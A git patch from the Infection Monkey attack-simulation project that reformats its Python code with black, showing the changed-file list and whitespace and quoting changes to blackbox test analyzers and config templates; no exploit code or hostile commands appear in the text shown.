From c40f7bf6c97f599303dd6470c8f295ec8fc386bb Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 6 Apr 2021 09:19:27 -0400 Subject: [PATCH] Reformat all python with black v20.8b1 --- .../monkey_zoo/blackbox/analyzers/analyzer.py | 1 - .../blackbox/analyzers/analyzer_log.py | 1 - .../analyzers/communication_analyzer.py | 3 +- .../analyzers/performance_analyzer.py | 5 +- .../blackbox/analyzers/zerologon_analyzer.py | 39 +- .../config_templates/base_template.py | 8 +- .../config_templates/config_template.py | 1 - .../blackbox/config_templates/drupal.py | 12 +- .../blackbox/config_templates/elastic.py | 12 +- .../blackbox/config_templates/hadoop.py | 10 +- .../blackbox/config_templates/mssql.py | 24 +- .../blackbox/config_templates/performance.py | 102 ++- .../blackbox/config_templates/shellshock.py | 10 +- .../blackbox/config_templates/smb_mimikatz.py | 26 +- .../blackbox/config_templates/smb_pth.py | 14 +- .../blackbox/config_templates/ssh.py | 23 +- .../blackbox/config_templates/struts2.py | 10 +- .../blackbox/config_templates/tunneling.py | 51 +- .../blackbox/config_templates/weblogic.py | 10 +- .../blackbox/config_templates/wmi_mimikatz.py | 28 +- .../blackbox/config_templates/zerologon.py | 14 +- envs/monkey_zoo/blackbox/conftest.py | 32 +- .../island_client/island_config_parser.py | 19 +- .../island_client/monkey_island_client.py | 34 +- .../island_client/monkey_island_requests.py | 65 +- .../blackbox/log_handlers/monkey_log.py | 8 +- .../log_handlers/monkey_log_parser.py | 3 +- .../log_handlers/monkey_logs_downloader.py | 1 - .../log_handlers/test_logs_handler.py | 8 +- envs/monkey_zoo/blackbox/test_blackbox.py | 178 ++-- envs/monkey_zoo/blackbox/tests/basic_test.py | 1 - .../monkey_zoo/blackbox/tests/exploitation.py | 21 +- .../performance/endpoint_performance_test.py | 6 +- .../tests/performance/map_generation.py | 30 +- .../map_generation_from_telemetries.py | 25 +- .../tests/performance/performance_test.py | 6 +- .../performance/performance_test_config.py | 10 +- .../performance/performance_test_workflow.py | 13 +- .../tests/performance/report_generation.py | 37 +- .../report_generation_from_telemetries.py | 27 +- .../sample_file_parser.py | 24 +- .../sample_multiplier/fake_ip_generator.py | 6 +- .../sample_multiplier/fake_monkey.py | 5 +- .../sample_multiplier/sample_multiplier.py | 67 +- .../test_fake_ip_generator.py | 18 +- .../performance/telemetry_performance_test.py | 38 +- .../telemetry_performance_test_workflow.py | 23 +- .../blackbox/utils/gcp_machine_handlers.py | 19 +- envs/os_compatibility/conftest.py | 10 +- envs/os_compatibility/test_compatibility.py | 7 +- monkey/__init__.py | 2 +- monkey/common/__init__.py | 2 +- monkey/common/cloud/__init__.py | 2 +- monkey/common/cloud/aws/aws_instance.py | 25 +- monkey/common/cloud/aws/aws_service.py | 35 +- monkey/common/cloud/aws/test_aws_instance.py | 150 ++-- monkey/common/cloud/aws/test_aws_service.py | 12 +- monkey/common/cloud/azure/azure_instance.py | 17 +- .../common/cloud/azure/test_azure_instance.py | 176 ++-- monkey/common/cloud/gcp/gcp_instance.py | 15 +- monkey/common/cloud/instance.py | 1 + monkey/common/cloud/scoutsuite_consts.py | 10 +- monkey/common/cmd/aws/aws_cmd_result.py | 13 +- monkey/common/cmd/aws/aws_cmd_runner.py | 17 +- monkey/common/cmd/cmd.py | 2 +- monkey/common/cmd/cmd_result.py | 2 +- monkey/common/cmd/cmd_runner.py | 21 +- monkey/common/cmd/cmd_status.py | 2 +- monkey/common/common_consts/api_url_consts.py | 2 +- monkey/common/common_consts/network_consts.py | 2 +- 
.../common/common_consts/telem_categories.py | 18 +- .../common/common_consts/zero_trust_consts.py | 98 ++- monkey/common/config_value_paths.py | 26 +- monkey/common/network/__init__.py | 2 +- monkey/common/network/network_range.py | 34 +- monkey/common/network/network_utils.py | 4 +- monkey/common/network/test_network_utils.py | 6 +- .../common/network/test_segmentation_utils.py | 16 +- monkey/common/utils/attack_utils.py | 46 +- monkey/common/utils/mongo_utils.py | 10 +- monkey/common/utils/shellcode_obfuscator.py | 4 +- .../common/utils/test_shellcode_obfuscator.py | 5 +- monkey/common/utils/wmi_utils.py | 3 +- monkey/common/version.py | 6 +- monkey/infection_monkey/__init__.py | 2 +- monkey/infection_monkey/config.py | 88 +- monkey/infection_monkey/control.py | 292 ++++--- monkey/infection_monkey/dropper.py | 177 ++-- .../infection_monkey/exploit/HostExploiter.py | 48 +- monkey/infection_monkey/exploit/drupal.py | 117 ++- .../infection_monkey/exploit/elasticgroovy.py | 45 +- monkey/infection_monkey/exploit/hadoop.py | 59 +- monkey/infection_monkey/exploit/mssqlexec.py | 108 ++- monkey/infection_monkey/exploit/sambacry.py | 300 ++++--- monkey/infection_monkey/exploit/shellshock.py | 137 +-- .../exploit/shellshock_resources.py | 806 +++++++++--------- monkey/infection_monkey/exploit/smbexec.py | 133 +-- monkey/infection_monkey/exploit/sshexec.py | 121 +-- monkey/infection_monkey/exploit/struts2.py | 50 +- .../exploit/tests/test_zerologon.py | 20 +- .../zerologon_utils/test_vuln_assessment.py | 4 +- .../infection_monkey/exploit/tools/helpers.py | 48 +- .../exploit/tools/http_tools.py | 23 +- .../exploit/tools/payload_parsing.py | 14 +- .../exploit/tools/payload_parsing_test.py | 18 +- .../exploit/tools/smb_tools.py | 184 ++-- .../exploit/tools/test_helpers.py | 19 +- .../exploit/tools/wmi_tools.py | 35 +- monkey/infection_monkey/exploit/vsftpd.py | 90 +- monkey/infection_monkey/exploit/web_rce.py | 234 +++-- monkey/infection_monkey/exploit/weblogic.py | 84 +- .../infection_monkey/exploit/win_ms08_067.py | 282 +++--- monkey/infection_monkey/exploit/wmiexec.py | 104 ++- monkey/infection_monkey/exploit/zerologon.py | 77 +- .../exploit/zerologon_utils/dump_secrets.py | 5 +- .../exploit/zerologon_utils/remote_shell.py | 12 +- .../zerologon_utils/vuln_assessment.py | 15 +- .../exploit/zerologon_utils/wmiexec.py | 4 +- monkey/infection_monkey/main.py | 85 +- monkey/infection_monkey/model/__init__.py | 72 +- monkey/infection_monkey/model/host.py | 6 +- .../model/victim_host_generator.py | 2 +- .../model/victim_host_generator_test.py | 15 +- monkey/infection_monkey/monkey.py | 149 +++- monkey/infection_monkey/monkeyfs.py | 8 +- monkey/infection_monkey/network/HostFinger.py | 4 +- monkey/infection_monkey/network/__init__.py | 2 +- .../infection_monkey/network/elasticfinger.py | 15 +- monkey/infection_monkey/network/firewall.py | 85 +- monkey/infection_monkey/network/httpfinger.py | 13 +- monkey/infection_monkey/network/info.py | 49 +- .../network/mssql_fingerprint.py | 51 +- .../infection_monkey/network/mysqlfinger.py | 27 +- .../network/network_scanner.py | 17 +- .../infection_monkey/network/ping_scanner.py | 23 +- .../network/postgresql_finger.py | 35 +- monkey/infection_monkey/network/smbfinger.py | 162 ++-- monkey/infection_monkey/network/sshfinger.py | 26 +- .../infection_monkey/network/tcp_scanner.py | 14 +- .../network/test_postgresql_finger.py | 29 +- monkey/infection_monkey/network/tools.py | 56 +- .../infection_monkey/post_breach/__init__.py | 2 +- 
.../account_discovery/account_discovery.py | 10 +- .../linux_account_discovery.py | 4 +- .../post_breach/actions/add_user.py | 9 +- .../actions/change_file_privileges.py | 9 +- .../actions/clear_command_history.py | 27 +- .../actions/communicate_as_new_user.py | 38 +- .../post_breach/actions/discover_accounts.py | 10 +- .../post_breach/actions/hide_files.py | 18 +- .../actions/modify_shell_startup_files.py | 38 +- .../post_breach/actions/schedule_jobs.py | 14 +- .../post_breach/actions/timestomping.py | 4 +- .../post_breach/actions/use_signed_scripts.py | 18 +- .../post_breach/actions/use_trap_command.py | 3 +- .../post_breach/actions/users_custom_pba.py | 28 +- .../clear_command_history.py | 15 +- .../linux_clear_command_history.py | 44 +- .../job_scheduling/job_scheduling.py | 8 +- .../job_scheduling/linux_job_scheduling.py | 12 +- .../job_scheduling/windows_job_scheduling.py | 8 +- monkey/infection_monkey/post_breach/pba.py | 10 +- .../post_breach/post_breach_handler.py | 2 +- .../setuid_setgid/linux_setuid_setgid.py | 6 +- .../setuid_setgid/setuid_setgid.py | 4 +- .../linux/shell_startup_files_modification.py | 47 +- .../shell_startup_files_modification.py | 10 +- .../shell_startup_files_modification.py | 24 +- .../signed_script_proxy.py | 10 +- .../windows/signed_script_proxy.py | 17 +- .../tests/actions/test_users_custom_pba.py | 28 +- .../timestomping/linux/timestomping.py | 10 +- .../post_breach/timestomping/timestomping.py | 8 +- .../timestomping/windows/timestomping.py | 4 +- .../trap_command/linux_trap_command.py | 4 +- .../hook-infection_monkey.exploit.py | 4 +- .../hook-infection_monkey.network.py | 4 +- ...ok-infection_monkey.post_breach.actions.py | 4 +- ...infection_monkey.system_info.collectors.py | 4 +- monkey/infection_monkey/pyinstaller_utils.py | 4 +- .../system_info/SSH_info_collector.py | 51 +- .../infection_monkey/system_info/__init__.py | 22 +- .../system_info/azure_cred_collector.py | 80 +- .../system_info/collectors/aws_collector.py | 10 +- .../collectors/process_list_collector.py | 2 +- .../scoutsuite_collector.py | 14 +- .../system_info/linux_info_collector.py | 4 +- .../system_info/netstat_collector.py | 33 +- .../system_info/system_info_collector.py | 1 + .../system_info_collectors_handler.py | 7 +- .../mimikatz_cred_collector.py | 5 +- .../pypykatz_handler.py | 57 +- .../test_pypykatz_handler.py | 215 +++-- .../windows_credentials.py | 10 +- .../system_info/windows_info_collector.py | 31 +- .../system_info/wmi_consts.py | 101 ++- monkey/infection_monkey/system_singleton.py | 29 +- .../telemetry/attack/attack_telem.py | 6 +- .../telemetry/attack/t1005_telem.py | 7 +- .../telemetry/attack/t1035_telem.py | 2 +- .../telemetry/attack/t1064_telem.py | 6 +- .../telemetry/attack/t1105_telem.py | 8 +- .../telemetry/attack/t1107_telem.py | 6 +- .../telemetry/attack/t1197_telem.py | 6 +- .../telemetry/attack/t1222_telem.py | 6 +- .../telemetry/attack/usage_telem.py | 5 +- .../telemetry/attack/victim_host_telem.py | 7 +- .../infection_monkey/telemetry/base_telem.py | 2 +- .../telemetry/exploit_telem.py | 11 +- .../telemetry/post_breach_telem.py | 11 +- .../infection_monkey/telemetry/scan_telem.py | 6 +- .../telemetry/scoutsuite_telem.py | 5 +- .../infection_monkey/telemetry/state_telem.py | 6 +- .../telemetry/system_info_telem.py | 1 - .../tests/attack/test_victim_host_telem.py | 2 +- .../infection_monkey/telemetry/trace_telem.py | 5 +- .../telemetry/tunnel_telem.py | 5 +- monkey/infection_monkey/transport/base.py | 2 +- monkey/infection_monkey/transport/http.py | 81 +- 
monkey/infection_monkey/transport/tcp.py | 9 +- monkey/infection_monkey/tunnel.py | 56 +- .../infection_monkey/utils/auto_new_user.py | 2 +- monkey/infection_monkey/utils/environment.py | 2 +- monkey/infection_monkey/utils/hidden_files.py | 24 +- .../utils/linux/hidden_files.py | 32 +- monkey/infection_monkey/utils/linux/users.py | 46 +- .../infection_monkey/utils/monkey_log_path.py | 10 +- .../infection_monkey/utils/plugins/plugin.py | 28 +- .../utils/plugins/pluginTests/BadInit.py | 1 - .../utils/plugins/pluginTests/ComboFile.py | 1 - .../utils/plugins/plugin_test.py | 1 - .../utils/windows/hidden_files.py | 81 +- .../infection_monkey/utils/windows/users.py | 50 +- monkey/infection_monkey/windows_upgrader.py | 38 +- monkey/monkey_island/__init__.py | 2 +- monkey/monkey_island/cc/__init__.py | 2 +- monkey/monkey_island/cc/app.py | 115 +-- monkey/monkey_island/cc/arg_parser.py | 7 +- monkey/monkey_island/cc/database.py | 4 +- .../monkey_island/cc/environment/__init__.py | 29 +- monkey/monkey_island/cc/environment/aws.py | 2 +- .../cc/environment/environment_config.py | 4 +- .../cc/environment/environment_singleton.py | 21 +- .../monkey_island/cc/environment/password.py | 2 +- .../cc/environment/set_server_config.py | 2 +- .../monkey_island/cc/environment/standard.py | 8 +- .../cc/environment/test__init__.py | 34 +- .../cc/environment/test_environment_config.py | 12 +- .../cc/environment/test_user_creds.py | 7 +- .../cc/environment/user_creds.py | 13 +- monkey/monkey_island/cc/main.py | 46 +- monkey/monkey_island/cc/models/__init__.py | 9 +- .../cc/models/attack/attack_mitigations.py | 24 +- .../cc/models/attack/mitigation.py | 4 +- .../cc/models/command_control_channel.py | 1 + monkey/monkey_island/cc/models/config.py | 3 +- monkey/monkey_island/cc/models/creds.py | 3 +- monkey/monkey_island/cc/models/edge.py | 2 +- monkey/monkey_island/cc/models/monkey.py | 34 +- monkey/monkey_island/cc/models/monkey_ttl.py | 10 +- monkey/monkey_island/cc/models/test_monkey.py | 53 +- .../cc/models/zero_trust/event.py | 8 +- .../cc/models/zero_trust/finding.py | 3 +- .../cc/models/zero_trust/monkey_finding.py | 4 +- .../models/zero_trust/scoutsuite_finding.py | 6 +- .../cc/models/zero_trust/test_event.py | 10 +- .../models/zero_trust/test_monkey_finding.py | 24 +- .../zero_trust/test_scoutsuite_finding.py | 19 +- .../cc/resources/T1216_pba_file_download.py | 8 +- monkey/monkey_island/cc/resources/__init__.py | 2 +- .../cc/resources/attack/__init__.py | 2 +- .../cc/resources/attack/attack_config.py | 19 +- .../cc/resources/attack/attack_report.py | 16 +- .../monkey_island/cc/resources/auth/auth.py | 14 +- .../cc/resources/auth/auth_user.py | 2 +- .../cc/resources/auth/registration.py | 2 +- .../monkey_island/cc/resources/bootloader.py | 15 +- .../cc/resources/bootloader_test.py | 85 +- .../monkey_island/cc/resources/client_run.py | 2 +- monkey/monkey_island/cc/resources/edge.py | 4 +- .../monkey_island/cc/resources/environment.py | 6 +- .../cc/resources/island_configuration.py | 8 +- .../monkey_island/cc/resources/island_logs.py | 2 +- .../monkey_island/cc/resources/local_run.py | 19 +- monkey/monkey_island/cc/resources/log.py | 8 +- monkey/monkey_island/cc/resources/monkey.py | 117 +-- .../cc/resources/monkey_configuration.py | 9 +- .../monkey_control/started_on_island.py | 2 +- .../cc/resources/monkey_download.py | 88 +- monkey/monkey_island/cc/resources/netmap.py | 8 +- monkey/monkey_island/cc/resources/node.py | 4 +- .../monkey_island/cc/resources/node_states.py | 2 +- 
.../cc/resources/pba_file_download.py | 2 +- .../cc/resources/pba_file_upload.py | 32 +- .../monkey_island/cc/resources/remote_run.py | 34 +- monkey/monkey_island/cc/resources/root.py | 11 +- .../cc/resources/security_report.py | 1 - .../monkey_island/cc/resources/telemetry.py | 43 +- .../cc/resources/telemetry_feed.py | 106 +-- .../cc/resources/test/clear_caches.py | 1 + .../cc/resources/test/log_test.py | 8 +- .../cc/resources/test/monkey_test.py | 4 +- .../cc/resources/test/telemetry_test.py | 4 +- .../cc/resources/test/utils/telem_store.py | 25 +- .../cc/resources/version_update.py | 8 +- .../cc/resources/zero_trust/finding_event.py | 11 +- .../zero_trust/scoutsuite_auth/aws_keys.py | 1 - .../scoutsuite_auth/scoutsuite_auth.py | 23 +- .../resources/zero_trust/zero_trust_report.py | 14 +- .../cc/server_utils/bootloader_server.py | 17 +- .../monkey_island/cc/server_utils/consts.py | 4 +- .../cc/server_utils/custom_json_encoder.py | 1 - .../cc/server_utils/encryptor.py | 10 +- .../cc/server_utils/island_logger.py | 4 +- monkey/monkey_island/cc/services/__init__.py | 2 +- .../cc/services/attack/__init__.py | 2 +- .../cc/services/attack/attack_config.py | 61 +- .../cc/services/attack/attack_report.py | 159 ++-- .../cc/services/attack/attack_schema.py | 154 ++-- .../cc/services/attack/mitre_api_interface.py | 32 +- .../attack/technique_reports/T1003.py | 32 +- .../attack/technique_reports/T1005.py | 53 +- .../attack/technique_reports/T1016.py | 46 +- .../attack/technique_reports/T1018.py | 43 +- .../attack/technique_reports/T1021.py | 42 +- .../attack/technique_reports/T1035.py | 2 +- .../attack/technique_reports/T1041.py | 13 +- .../attack/technique_reports/T1053.py | 4 +- .../attack/technique_reports/T1059.py | 24 +- .../attack/technique_reports/T1064.py | 2 +- .../attack/technique_reports/T1065.py | 2 +- .../attack/technique_reports/T1075.py | 58 +- .../attack/technique_reports/T1082.py | 85 +- .../attack/technique_reports/T1086.py | 37 +- .../attack/technique_reports/T1090.py | 2 +- .../attack/technique_reports/T1105.py | 23 +- .../attack/technique_reports/T1106.py | 2 +- .../attack/technique_reports/T1107.py | 41 +- .../attack/technique_reports/T1110.py | 37 +- .../attack/technique_reports/T1129.py | 6 +- .../attack/technique_reports/T1136.py | 5 +- .../attack/technique_reports/T1145.py | 22 +- .../attack/technique_reports/T1146.py | 28 +- .../attack/technique_reports/T1156.py | 37 +- .../attack/technique_reports/T1168.py | 4 +- .../attack/technique_reports/T1188.py | 12 +- .../attack/technique_reports/T1197.py | 29 +- .../attack/technique_reports/T1210.py | 52 +- .../attack/technique_reports/T1216.py | 28 +- .../attack/technique_reports/T1222.py | 26 +- .../attack/technique_reports/T1504.py | 28 +- .../attack/technique_reports/__init__.py | 47 +- .../attack/technique_reports/pba_technique.py | 36 +- .../technique_report_tools.py | 20 +- .../technique_reports/usage_technique.py | 49 +- .../attack/test_mitre_api_interface.py | 9 +- .../monkey_island/cc/services/bootloader.py | 44 +- .../cc/services/bootloader_test.py | 13 +- monkey/monkey_island/cc/services/config.py | 192 +++-- .../cc/services/config_schema/basic.py | 38 +- .../services/config_schema/basic_network.py | 82 +- .../services/config_schema/config_schema.py | 16 +- .../definitions/finger_classes.py | 54 +- .../definitions/post_breach_actions.py | 82 +- .../system_info_collector_classes.py | 51 +- .../cc/services/config_schema/internal.py | 279 +++--- .../cc/services/config_schema/monkey.py | 77 +- 
monkey/monkey_island/cc/services/database.py | 13 +- .../cc/services/edge/displayed_edge.py | 45 +- monkey/monkey_island/cc/services/edge/edge.py | 15 +- .../cc/services/edge/test_displayed_edge.py | 114 +-- .../cc/services/edge/test_edge.py | 5 +- .../cc/services/groups_and_users_consts.py | 2 +- .../cc/services/infection_lifecycle.py | 23 +- .../monkey_island/cc/services/island_logs.py | 12 +- monkey/monkey_island/cc/services/log.py | 34 +- .../cc/services/netmap/net_edge.py | 42 +- .../cc/services/netmap/net_node.py | 1 - monkey/monkey_island/cc/services/node.py | 220 +++-- .../cc/services/post_breach_files.py | 28 +- .../cc/services/remote_run_aws.py | 65 +- .../cc/services/reporting/aws_exporter.py | 256 +++--- .../cc/services/reporting/exporter_init.py | 5 +- .../exploiter_descriptor_enum.py | 65 +- .../exploiter_report_info.py | 6 +- .../processors/cred_exploit.py | 25 +- .../exploit_processing/processors/exploit.py | 8 +- .../processors/shellshock_exploit.py | 13 +- .../processors/zerologon.py | 9 +- .../cc/services/reporting/pth_report.py | 239 +++--- .../cc/services/reporting/report.py | 509 ++++++----- .../reporting/report_exporter_manager.py | 4 +- .../report_generation_synchronisation.py | 2 + .../cc/services/reporting/test_report.py | 73 +- .../cc/services/representations.py | 6 +- .../cc/services/representations_test.py | 40 +- .../services/telemetry/processing/exploit.py | 65 +- .../telemetry/processing/post_breach.py | 28 +- .../telemetry/processing/processing.py | 33 +- .../cc/services/telemetry/processing/scan.py | 30 +- .../telemetry/processing/scoutsuite.py | 22 +- .../cc/services/telemetry/processing/state.py | 21 +- .../telemetry/processing/system_info.py | 63 +- .../processing/system_info_collectors/aws.py | 4 +- .../system_info_telemetry_dispatcher.py | 52 +- .../test_environment.py | 7 +- .../test_system_info_telemetry_dispatcher.py | 11 +- .../telemetry/processing/test_post_breach.py | 124 ++- .../services/telemetry/processing/tunnel.py | 8 +- .../cc/services/telemetry/processing/utils.py | 8 +- .../zero_trust_checks/antivirus_existence.py | 36 +- .../communicate_as_new_user.py | 35 +- .../zero_trust_checks/data_endpoints.py | 109 ++- .../zero_trust_checks/known_anti_viruses.py | 2 +- .../zero_trust_checks/machine_exploited.py | 24 +- .../zero_trust_checks/segmentation.py | 60 +- .../test_segmentation_checks.py | 38 +- .../telemetry/zero_trust_checks/tunneling.py | 32 +- .../services/tests/reporting/test_report.py | 10 +- .../cc/services/tests/test_config.py | 9 +- .../cc/services/utils/network_utils.py | 35 +- .../cc/services/utils/node_states.py | 64 +- .../cc/services/utils/node_states_test.py | 17 +- .../cc/services/version_update.py | 22 +- .../monkey_island/cc/services/wmi_handler.py | 147 ++-- .../monkey_zt_details_service.py | 30 +- .../monkey_zt_finding_service.py | 22 +- .../test_monkey_zt_details_service.py | 20 +- .../test_monkey_zt_finding_service.py | 45 +- .../scoutsuite/consts/rule_consts.py | 4 +- .../consts/rule_names/cloudformation_rules.py | 6 +- .../consts/rule_names/cloudtrail_rules.py | 16 +- .../consts/rule_names/cloudwatch_rules.py | 6 +- .../consts/rule_names/config_rules.py | 6 +- .../scoutsuite/consts/rule_names/ec2_rules.py | 56 +- .../scoutsuite/consts/rule_names/elb_rules.py | 10 +- .../consts/rule_names/elbv2_rules.py | 14 +- .../scoutsuite/consts/rule_names/iam_rules.py | 68 +- .../scoutsuite/consts/rule_names/rds_rules.py | 20 +- .../consts/rule_names/redshift_rules.py | 16 +- .../scoutsuite/consts/rule_names/s3_rules.py | 40 +- 
.../scoutsuite/consts/rule_names/ses_rules.py | 8 +- .../scoutsuite/consts/rule_names/sns_rules.py | 18 +- .../scoutsuite/consts/rule_names/sqs_rules.py | 20 +- .../scoutsuite/consts/rule_names/vpc_rules.py | 20 +- .../consts/scoutsuite_finding_maps.py | 115 ++- .../consts/scoutsuite_findings_list.py | 22 +- .../scoutsuite/consts/service_consts.py | 52 +- .../scoutsuite/data_parsing/rule_parser.py | 12 +- .../abstract_rule_path_creator.py | 12 +- .../cloudformation_rule_path_creator.py | 9 +- .../cloudtrail_rule_path_creator.py | 9 +- .../cloudwatch_rule_path_creator.py | 9 +- .../config_rule_path_creator.py | 9 +- .../ec2_rule_path_creator.py | 5 +- .../elb_rule_path_creator.py | 5 +- .../elbv2_rule_path_creator.py | 5 +- .../iam_rule_path_creator.py | 5 +- .../rds_rule_path_creator.py | 5 +- .../redshift_rule_path_creator.py | 9 +- .../s3_rule_path_creator.py | 5 +- .../ses_rule_path_creator.py | 5 +- .../sns_rule_path_creator.py | 5 +- .../sqs_rule_path_creator.py | 5 +- .../vpc_rule_path_creator.py | 5 +- .../rule_path_creators_list.py | 96 ++- .../data_parsing/test_rule_parser.py | 30 +- .../scoutsuite/scoutsuite_auth_service.py | 26 +- .../scoutsuite/scoutsuite_rule_service.py | 25 +- .../scoutsuite_zt_finding_service.py | 32 +- .../test_scoutsuite_auth_service.py | 14 +- .../test_scoutsuite_rule_service.py | 45 +- .../test_scoutsuite_zt_finding_service.py | 10 +- .../zero_trust/test_common/finding_data.py | 28 +- .../test_common/monkey_finding_data.py | 15 +- .../test_common/raw_scoutsute_data.py | 237 +++-- .../test_common/scoutsuite_finding_data.py | 98 +-- .../zero_trust_report/finding_service.py | 17 +- .../zero_trust_report/pillar_service.py | 17 +- .../zero_trust_report/principle_service.py | 21 +- .../test_common/example_finding_data.py | 83 +- .../zero_trust_report/test_finding_service.py | 58 +- .../zero_trust_report/test_pillar_service.py | 44 +- .../test_principle_service.py | 86 +- monkey/monkey_island/cc/setup.py | 21 +- .../cc/test_common/fixtures/fixture_enum.py | 2 +- .../fixtures/mongomock_fixtures.py | 6 +- .../profiling/profiler_decorator.py | 7 +- .../pyinstaller_hooks/hook-stix2.py | 4 +- .../scripts/island_password_hasher.py | 2 +- 490 files changed, 9607 insertions(+), 7227 deletions(-) diff --git a/envs/monkey_zoo/blackbox/analyzers/analyzer.py b/envs/monkey_zoo/blackbox/analyzers/analyzer.py index 13db46cb3..c4b55c766 100644 --- a/envs/monkey_zoo/blackbox/analyzers/analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/analyzer.py @@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod class Analyzer(object, metaclass=ABCMeta): - @abstractmethod def analyze_test_results(self) -> bool: raise NotImplementedError() diff --git a/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py b/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py index f97418813..88d06d52b 100644 --- a/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py +++ b/envs/monkey_zoo/blackbox/analyzers/analyzer_log.py @@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run." 
class AnalyzerLog(object): - def __init__(self, analyzer_name): self.contents = LOG_INIT_MESSAGE self.name = analyzer_name diff --git a/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py index 22841f783..9f43bee7c 100644 --- a/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py @@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog class CommunicationAnalyzer(Analyzer): - def __init__(self, island_client, machine_ips): self.island_client = island_client self.machine_ips = machine_ips @@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer): return all_monkeys_communicated def did_monkey_communicate_back(self, machine_ip): - query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}} + query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}} return len(self.island_client.find_monkeys_in_db(query)) > 0 diff --git a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py index 4a43ab6a5..18390e67e 100644 --- a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py @@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__) class PerformanceAnalyzer(Analyzer): - - def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]): + def __init__( + self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta] + ): self.performance_test_config = performance_test_config self.endpoint_timings = endpoint_timings diff --git a/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py index f5da3a2e1..6f71256b9 100644 --- a/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py +++ b/envs/monkey_zoo/blackbox/analyzers/zerologon_analyzer.py @@ -3,19 +3,25 @@ from pprint import pformat import dpath.util -from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH +from common.config_value_paths import ( + USER_LIST_PATH, + PASSWORD_LIST_PATH, + NTLM_HASH_LIST_PATH, + LM_HASH_LIST_PATH, +) from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient # Query for telemetry collection to see if password restoration was successful -TELEM_QUERY = {'telem_category': 'exploit', - 'data.exploiter': 'ZerologonExploiter', - 'data.info.password_restored': True} +TELEM_QUERY = { + "telem_category": "exploit", + "data.exploiter": "ZerologonExploiter", + "data.info.password_restored": True, +} class ZerologonAnalyzer(Analyzer): - def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]): self.island_client = island_client self.expected_credentials = expected_credentials @@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer): @staticmethod def _get_relevant_credentials(config: dict): credentials_on_island = [] - credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH)) - credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH)) - credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH)) + 
credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH)) + credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH)) + credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH)) return credentials_on_island - def _is_all_credentials_in_list(self, - all_creds: List[str]) -> bool: + def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool: credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds] self._log_creds_not_gathered(credentials_missing) return not credentials_missing @@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer): def _log_credential_restore(self, telem_list: List[dict]): if telem_list: - self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials " - "were successfully restored.") + self.log.add_entry( + "Zerologon exploiter telemetry contains indicators that credentials " + "were successfully restored." + ) else: - self.log.add_entry("Credential restore failed or credential restore " - "telemetry not found on the Monkey Island.") + self.log.add_entry( + "Credential restore failed or credential restore " + "telemetry not found on the Monkey Island." + ) self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}") - - diff --git a/envs/monkey_zoo/blackbox/config_templates/base_template.py b/envs/monkey_zoo/blackbox/config_templates/base_template.py index 9ebea6f1f..316f02ed7 100644 --- a/envs/monkey_zoo/blackbox/config_templates/base_template.py +++ b/envs/monkey_zoo/blackbox/config_templates/base_template.py @@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate): "basic.exploiters.exploiter_classes": [], "basic_network.scope.local_network_scan": False, "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], - "internal.monkey.system_info.system_info_collector_classes": - ["EnvironmentCollector", "HostnameCollector"], - "monkey.post_breach.post_breach_actions": [] + "internal.monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + ], + "monkey.post_breach.post_breach_actions": [], } diff --git a/envs/monkey_zoo/blackbox/config_templates/config_template.py b/envs/monkey_zoo/blackbox/config_templates/config_template.py index e0ff4e568..915a0cc78 100644 --- a/envs/monkey_zoo/blackbox/config_templates/config_template.py +++ b/envs/monkey_zoo/blackbox/config_templates/config_template.py @@ -2,7 +2,6 @@ from abc import ABC, abstractmethod class ConfigTemplate(ABC): - @property @abstractmethod def config_values(self) -> dict: diff --git a/envs/monkey_zoo/blackbox/config_templates/drupal.py b/envs/monkey_zoo/blackbox/config_templates/drupal.py index e202219dc..28c50872e 100644 --- 